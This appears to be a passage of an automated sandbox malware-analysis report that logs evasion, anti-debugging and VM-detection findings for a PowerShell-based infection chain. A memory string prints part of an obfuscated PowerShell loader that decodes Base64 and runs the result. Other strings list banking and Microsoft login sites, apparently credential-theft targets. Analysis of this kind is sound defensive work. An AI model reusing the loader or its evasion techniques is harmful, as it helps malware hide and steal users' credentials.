        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDFE20 rdtsc 10_2_1FDDFE20
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5773Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4049Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7995Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1795Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeAPI coverage: 0.4 %
        Source: C:\Windows\SysWOW64\recover.exeAPI coverage: 3.2 %
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2120Thread sleep time: -3689348814741908s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6260Thread sleep count: 7995 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3420Thread sleep count: 1795 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2644Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Windows\SysWOW64\recover.exe TID: 4776Thread sleep count: 57 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\recover.exe TID: 4776Thread sleep time: -114000s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\recover.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\recover.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\recover.exeCode function: 13_2_02D0B6B0 FindFirstFileW,FindNextFileW,FindClose,13_2_02D0B6B0
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: 424iy8O9X8.13.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
        Source: 424iy8O9X8.13.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
        Source: 424iy8O9X8.13.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
        Source: 424iy8O9X8.13.drBinary or memory string: discord.comVMware20,11696487552f
        Source: 424iy8O9X8.13.drBinary or memory string: bankofamerica.comVMware20,11696487552x
        Source: wab.exe, 0000000A.00000002.2619504780.000000000431F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@@5
        Source: 424iy8O9X8.13.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
        Source: wab.exe, 00000011.00000002.2856546297.00000000031E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: wab.exe, 0000000A.00000003.2492749809.000000000434D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2619611582.000000000434D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2492965729.000000000434D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: 424iy8O9X8.13.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
        Source: 424iy8O9X8.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
        Source: 424iy8O9X8.13.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
        Source: 424iy8O9X8.13.drBinary or memory string: global block list test formVMware20,11696487552
        Source: 424iy8O9X8.13.drBinary or memory string: tasks.office.comVMware20,11696487552o
        Source: wscript.exe, 00000001.00000003.2093611979.000001B70E26D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D$DTTr aDnFs,p,a tVr oHn,iNz eSdB)O ');Hydrolyzable (unkaiserlike ' $sgSl o bHa lM: DHe,cKeUnUtSrSaEl iUsTeFdf U=. C[ SSydsAt.e mV.,T e x.tS. EDnAc o d i n g ]C:S: A.S CII.IB.mGPe tSS,t.r.i n g (S$MU,n lba.i d )S ');Hydrolyzable (unkaiserlike 'v$pg.lBo b,a l,:CM,u s e.u mAiBs,e,=S$,D e,cCe,n t r,aPlEi.sRe d ..s uTbBsTt rIi,nCgG( 3.0E7C5.8 3O, 2,5B2 1.6D) ');Hydrolyzable $Museumise;"Printer Extensions and NotificationsUser Profile ServiceWindows PushToInstall ServiceQuality Windows Audio Video ExperienceRemote Access Auto Connection ManagerRemote Access Connection ManagerRouting and Remote AccessRemote RegistryRetail Demo ServiceRadio Management ServiceRPC Endpoint MapperRemote Procedure Call (RPC) LocatorRemote Procedure Call (RPC)Security Accounts ManagerSmart CardSmart Card Device Enumeration ServiceTask SchedulerSmart Card Removal PolicyWindows BackupSecondary Log-onWindows Security ServicePayments and NFC/SE ManagerSystem Event Notification ServiceWindows Defender Advanced Threat Protection ServiceSensor Data ServiceSensor ServiceSensor Monitoring ServiceRemote Desktop ConfigurationSystem Guard Runtime Monitor BrokerInternet Connection Sharing (ICS)Spatial Data ServiceShell Hardware DetectionShared PC Account ManagerMicrosoft Storage Spaces SMPMicrosoft Windows SMS Router Service.SNMP TrapWindows Perception ServicePrint SpoolerSoftware ProtectionSSDP DiscoveryOpenSSH Authentication AgentSecure Socket Tunneling Protocol ServiceState Repository ServiceWindows Image Acquisition (WIA)Storage ServiceSpot VerifierMicrosoft Software Shadow Copy ProviderSysMainSystem Events BrokerTouch Keyboard and Handwriting Panel ServiceTelephonyRemote Desktop ServicesThemesStorage Tiers ManagementTime BrokerWeb Account ManagerDistributed Link Tracking ClientRecommended Troubleshooting ServiceWindows Modules InstallerAuto Time Zone UpdaterUser Experience Virtualization ServiceRemote Desktop Services UserMode Port RedirectorUPnP Device HostUser ManagerUpdate Orchestrator
        Source: 424iy8O9X8.13.drBinary or memory string: AMC password management pageVMware20,11696487552
        Source: powershell.exe, 00000002.00000002.2652707419.00000243354FD000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3357718213.0000000002DF5000.00000004.00000020.00020000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000002.3358949019.000000000123F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: 424iy8O9X8.13.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
        Source: 424iy8O9X8.13.drBinary or memory string: interactivebrokers.comVMware20,11696487552
        Source: 424iy8O9X8.13.drBinary or memory string: dev.azure.comVMware20,11696487552j
        Source: 424iy8O9X8.13.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
        Source: 424iy8O9X8.13.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
        Source: wab.exe, 0000000F.00000002.2771870139.00000000031B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: 424iy8O9X8.13.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
        Source: 424iy8O9X8.13.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
        Source: 424iy8O9X8.13.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
        Source: 424iy8O9X8.13.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
        Source: 424iy8O9X8.13.drBinary or memory string: outlook.office365.comVMware20,11696487552t
        Source: 424iy8O9X8.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
        Source: 424iy8O9X8.13.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
        Source: 424iy8O9X8.13.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
        Source: 424iy8O9X8.13.drBinary or memory string: outlook.office.comVMware20,11696487552s
        Source: wscript.exe, 00000001.00000002.2094818305.000001B70E252000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tallerAuto Time Zone UpdaterUser Experience Virtualization ServiceRemote Desktop Services UserMode Port RedirectorUPnP Device HostUser ManagerUpdate Orchestrator ServiceVolumetric Audio Compositor ServiceCredential ManagerVirtual DiskHyper-V Guest Service InterfacevmicheartbeatHyper-V Data Exchange ServiceHyper-V Remote Desktop Virtualization ServicevmicshutdownHyper-V Time Synchronization ServiceHyper-V PowerShell Direct ServicevmicvssVolume Shadow CopyWindows TimeWalletServiceWarpJITSvcBlock Level Backup user ServiceWindows Biometric ServiceWindows Connection ManagerWindows Connect Now - Config RegistrarDiagnostic Service HostDiagnostic System HostMicrosoft Defender Antivirus Network Inspection ServiceWebClientWindows Event CollectorWindows Encryption Provider Host ServiceProblem Reports Control Panel SupportWindows Error Reporting ServiceWi-Fi Direct Services Connection Manager ServiceStill Image Acquisition EventsMicrosoft Defender Antivirus ServiceWinHTTP Web Proxy Auto-Discovery ServiceWindows Management InstrumentationWindows Remote Management (WS-Management)Windows Insider ServiceWLAN AutoConfigMicrosoft Account Sign-in AssistantLocal Profile Assistant ServiceWindows Management ServiceWMI Performance AdapterWindows Media Player Network Sharing ServiceWork FoldersParental ControlsPortable Device Enumerator ServiceWindows Push Notifications System ServiceSecurity CenterWindows SearchWindows UpdateWWAN AutoConfigXbox Live Auth ManagerXbox Live Game SaveXbox Accessory Management ServiceXbox Live Networking ServiceAgent Activation Runtime_27019GameDVR and Broadcast User Service_27019Bluetooth User Support Service_27019CaptureService_27019Clipboard User Service_27019Connected Devices Platform User Service_27019ConsentUX_27019CredentialEnrollmentManagerUserSvc_27019DeviceAssociationBroker_27019DevicePicker_27019DevicesFlow_27019MessagingService_27019Sync Host_27019Contact Data_27019PrintWorkflow_27019Udk User Service_27019User Data Storage_27019User Data Access_27019Windows Push Notifications User Service_27019-Run Servi
        Source: 424iy8O9X8.13.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
        Source: 424iy8O9X8.13.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
        Source: 424iy8O9X8.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
        Source: firefox.exe, 00000012.00000002.3264539600.00000271040CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllllQ
        Source: 424iy8O9X8.13.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
        Source: 424iy8O9X8.13.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

        Anti Debugging

        barindex
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeThread information set: HideFromDebuggerJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\recover.exeProcess queried: DebugPortJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDFE20 rdtsc 10_2_1FDDFE20
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_029ED8B8 LdrInitializeThunk,LdrInitializeThunk,5_2_029ED8B8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE74FE7 mov eax, dword ptr fs:[00000030h]10_2_1FE74FE7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9EFD8 mov eax, dword ptr fs:[00000030h]10_2_1FD9EFD8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9EFD8 mov eax, dword ptr fs:[00000030h]10_2_1FD9EFD8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9EFD8 mov eax, dword ptr fs:[00000030h]10_2_1FD9EFD8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FD9BFD0 mov eax, dword ptr fs:[00000030h]10_2_1FD9BFD0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD1FCD mov eax, dword ptr fs:[00000030h]10_2_1FDD1FCD
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD1FCD mov eax, dword ptr fs:[00000030h]10_2_1FDD1FCD
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD1FCD mov eax, dword ptr fs:[00000030h]10_2_1FDD1FCD
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE56FF7 mov eax, dword ptr fs:[00000030h]10_2_1FE56FF7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA2FC8 mov eax, dword ptr fs:[00000030h]10_2_1FDA2FC8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA2FC8 mov eax, dword ptr fs:[00000030h]10_2_1FDA2FC8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA2FC8 mov eax, dword ptr fs:[00000030h]10_2_1FDA2FC8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA2FC8 mov eax, dword ptr fs:[00000030h]10_2_1FDA2FC8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDA3FC2 mov eax, dword ptr fs:[00000030h]10_2_1FDA3FC2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5BFC0 mov ecx, dword ptr fs:[00000030h]10_2_1FE5BFC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE5BFC0 mov eax, dword ptr fs:[00000030h]10_2_1FE5BFC0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE0FF6 mov eax, dword ptr fs:[00000030h]10_2_1FDE0FF6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE0FF6 mov eax, dword ptr fs:[00000030h]10_2_1FDE0FF6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE0FF6 mov eax, dword ptr fs:[00000030h]10_2_1FDE0FF6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDE0FF6 mov eax, dword ptr fs:[00000030h]10_2_1FDE0FF6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDBFEC mov eax, dword ptr fs:[00000030h]10_2_1FDDBFEC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDBFEC mov eax, dword ptr fs:[00000030h]10_2_1FDDBFEC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDDBFEC mov eax, dword ptr fs:[00000030h]10_2_1FDDBFEC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FE23FD7 mov eax, dword ptr fs:[00000030h]10_2_1FE23FD7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDBCFE0 mov eax, dword ptr fs:[00000030h]10_2_1FDBCFE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDBCFE0 mov eax, dword ptr fs:[00000030h]10_2_1FDBCFE0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD2F98 mov eax, dword ptr fs:[00000030h]10_2_1FDD2F98
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDD2F98 mov eax, dword ptr fs:[00000030h]10_2_1FDD2F98
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB1F92 mov ecx, dword ptr fs:[00000030h]10_2_1FDB1F92
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB1F92 mov ecx, dword ptr fs:[00000030h]10_2_1FDB1F92
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB1F92 mov eax, dword ptr fs:[00000030h]10_2_1FDB1F92
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB1F92 mov ecx, dword ptr fs:[00000030h]10_2_1FDB1F92
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB1F92 mov ecx, dword ptr fs:[00000030h]10_2_1FDB1F92
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB1F92 mov eax, dword ptr fs:[00000030h]10_2_1FDB1F92
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB1F92 mov ecx, dword ptr fs:[00000030h]10_2_1FDB1F92
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB1F92 mov ecx, dword ptr fs:[00000030h]10_2_1FDB1F92
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB1F92 mov eax, dword ptr fs:[00000030h]10_2_1FDB1F92
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB1F92 mov ecx, dword ptr fs:[00000030h]10_2_1FDB1F92
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 10_2_1FDB1F92 mov ecx, dword ptr fs:[00000030h]10_2_1FDB1F92
